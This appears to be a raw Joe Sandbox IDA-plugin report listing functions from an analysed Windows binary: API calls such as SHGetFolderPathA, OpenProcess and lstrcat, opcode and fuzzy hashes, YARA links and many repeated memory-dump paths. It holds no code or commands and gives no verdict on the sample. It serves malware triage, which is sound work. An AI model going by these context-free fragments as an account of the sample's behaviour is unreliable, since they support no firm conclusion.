                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: e1f04d2807eee5080e6c0ccd5f18842fb83ff21abf1a010c4b4c471a73f4fb44
                              • Instruction ID: 5969b71989c7ef2d0227762acd7cecc02d9dcc4de60385c5be782d1c5a58e3ed
                              • Opcode Fuzzy Hash: e1f04d2807eee5080e6c0ccd5f18842fb83ff21abf1a010c4b4c471a73f4fb44
                              • Instruction Fuzzy Hash: A951A8711042056FDB54EF24DC4AEEE7BA8FBC4340F40C82DB95543251EE34A9498BE6
                              Function 005B1F50 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 005B1F5F, 005B1F75, 005B2037
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: 1ff02a9c505612bb25765dc2892fd23d83a56ddea0b047198a8b7075124ebfd8
                              • Instruction ID: ab33ecfc0f0f159a38d6d2f370d77899af650882abab1a8f8298965540a8c567
                              • Opcode Fuzzy Hash: 1ff02a9c505612bb25765dc2892fd23d83a56ddea0b047198a8b7075124ebfd8
                              • Instruction Fuzzy Hash: B0215A3951068D8ED710FAB6C458BEDFBA7FF84391F844456C8084B242F335390AD7A9
                              Function 005AECD0 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AED14
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AED43
                              • lstrcat.KERNEL32(?,00000000), ref: 005AED51
                              • lstrcat.KERNEL32(?,0160E7A8), ref: 005AED6C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 4a54a06a47d3c7273c376876e2280281ffce361892759d5c9cacbdac9e7cca84
                              • Instruction ID: 6f1925a7d4654a0a37f7f8e452ab8b463422e1ce94dddcaf8079f17dacf9efd5
                              • Opcode Fuzzy Hash: 4a54a06a47d3c7273c376876e2280281ffce361892759d5c9cacbdac9e7cca84
                              • Instruction Fuzzy Hash: 4631C471A1111AABCF50EF64DC4AFEE7BB4FF88700F004468BA4597251DF34AE858B94
                              Function 005B44A0 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 005B44B2
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 005B44CD
                              • CloseHandle.KERNEL32(00000000), ref: 005B44D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B4507
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: 6701713b0b9f2be1c14029e6d0ad877137d22c07d7a82aed0ab8e14e9b002d24
                              • Instruction ID: 3cf7f99d2fe785caf5b5acfcf6da0a8a629e971c6ecdde4b796b100afe197585
                              • Opcode Fuzzy Hash: 6701713b0b9f2be1c14029e6d0ad877137d22c07d7a82aed0ab8e14e9b002d24
                              • Instruction Fuzzy Hash: 1AF0F6B19016152BEB30AB749C4DFE6BFA8BF14300F0480A4FB45D6181DBB49CD4CB94
                              Function 005B9001 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 005B900D
                                • Part of subcall function 005B882F: __amsg_exit.LIBCMT ref: 005B883F
                              • __getptd.LIBCMT ref: 005B9024
                              • __amsg_exit.LIBCMT ref: 005B9032
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 005B9056
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 9ed33e855b504e783a5e5c7012608c874c261425224b8bc6647610df6af1933e
                              • Instruction ID: 8f4c3879be425c8844e297a5b43d6d090faf42b9e8e546a5ad2074f769a4bede
                              • Opcode Fuzzy Hash: 9ed33e855b504e783a5e5c7012608c874c261425224b8bc6647610df6af1933e
                              • Instruction Fuzzy Hash: AAF0B432908B199FDB64BBB8580FBED7FB07F84720F140149F505A62D2CF687940DA95
                              Function 005B7340 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(------,00595B1B), ref: 005B734B
                              • lstrcpy.KERNEL32(00000000), ref: 005B736F
                              • lstrcat.KERNEL32(?,------), ref: 005B7379
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              • Opcode ID: 0483db682aea50af5e0ee30df8ed7025373ffa04369f18f75ee17f88815b74bc
                              • Instruction ID: be9c56bb64b8f0239ddb13efb13ead0cb5ba1f822188b6af60efbf7c303e3302
                              • Opcode Fuzzy Hash: 0483db682aea50af5e0ee30df8ed7025373ffa04369f18f75ee17f88815b74bc
                              • Instruction Fuzzy Hash: C3F015749013029FCB609F35D848D26BBF8BF98700314886DA88AC7224EA34E8418B10
                              Function 005A3770 Relevance: 5.5, APIs: 4, Instructions: 490stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A37CE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A37F7
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A381D
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A3843
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 239c9c455d5bbe5c892a5a5e69147ee0effd2b51214697852b46c285b528e580
                              • Instruction ID: 7036d6be5b682f44881904e0edd02708980d92781a5716b1fe75f61ecd6817ae
                              • Opcode Fuzzy Hash: 239c9c455d5bbe5c892a5a5e69147ee0effd2b51214697852b46c285b528e580
                              • Instruction Fuzzy Hash: 77121E70A012158FDB68CF19C558B29BBE5BF45728B1DC0AEE809DB3A2D776DD42CB40
                              Function 005A7CA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7D14
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7D2F
                                • Part of subcall function 005A7DC0: std::_Xinvalid_argument.LIBCPMT ref: 005A7DD8
                                • Part of subcall function 005A7DC0: std::_Xinvalid_argument.LIBCPMT ref: 005A7DF6
                                • Part of subcall function 005A7DC0: std::_Xinvalid_argument.LIBCPMT ref: 005A7E11
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              • Opcode ID: df2df978c1963ccf8766a0760255b19fe586d2369554a7c479a812e3dab025a2
                              • Instruction ID: 3edf409a07b2c75461417c38df280894be6036bfad843bb41ecb726d6967960c
                              • Opcode Fuzzy Hash: df2df978c1963ccf8766a0760255b19fe586d2369554a7c479a812e3dab025a2
                              • Instruction Fuzzy Hash: 6C31D8723086144BE7209D6CEC84A7EFFE9FF9A760B20492AF1468B642D7719C4183E4
                              Function 00596E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00596EB4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00596EBB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              • Opcode ID: 11061d9ec061326deebdbf7d98b49609d86663c113681175afbf74901b769dc0
                              • Instruction ID: ed62cdbfecb3ae5a0198e1fb1365510161275957eeb1208cea6ba795646c88a3
                              • Opcode Fuzzy Hash: 11061d9ec061326deebdbf7d98b49609d86663c113681175afbf74901b769dc0
                              • Instruction Fuzzy Hash: 71217FB16007119BEF608B24CC84BB777E8FB45704F44886CE94ACB685FBB8E989C755
                              Function 005B8702 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005B784C: __mtinitlocknum.LIBCMT ref: 005B7862
                                • Part of subcall function 005B784C: __amsg_exit.LIBCMT ref: 005B786E
                              • ___addlocaleref.LIBCMT ref: 005B8786
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$xt\
                              • API String ID: 3105635775-4074808725
                              • Opcode ID: c5499c49a436f99c1476a23b542d045fc6028fef64b534fc26f48607916dea6e
                              • Instruction ID: 114bdf7478639a2a0d79f2a6dc23f72e23cfbaefda94c791fe00927b68fb3c24
                              • Opcode Fuzzy Hash: c5499c49a436f99c1476a23b542d045fc6028fef64b534fc26f48607916dea6e
                              • Instruction Fuzzy Hash: DE01AD71444B059FD720AFB9D80AB9ABFE0BF90314F20990EE0D9572A0CBB0B644CB14
                              Function 00598B50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              • std::exception::exception.LIBCMT ref: 00598B8B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception
                              • String ID: PvY$xY
                              • API String ID: 2807920213-55992228
                              • Opcode ID: d1bf39db06c2955103213d14b719befeb2b5474506287756e6bc5c93320f8b70
                              • Instruction ID: 92b86cff6dcc28227dc2c0ec3b7616633dcbec796166682e77533b9930e145a4
                              • Opcode Fuzzy Hash: d1bf39db06c2955103213d14b719befeb2b5474506287756e6bc5c93320f8b70
                              • Instruction Fuzzy Hash: 74F0ECF5A0430A56FF04E6E49C56BFE7BB4BF50304F08496DD915D1201FBB4E6058192
                              Function 00598D80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • std::exception::exception.LIBCMT ref: 00598DAD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
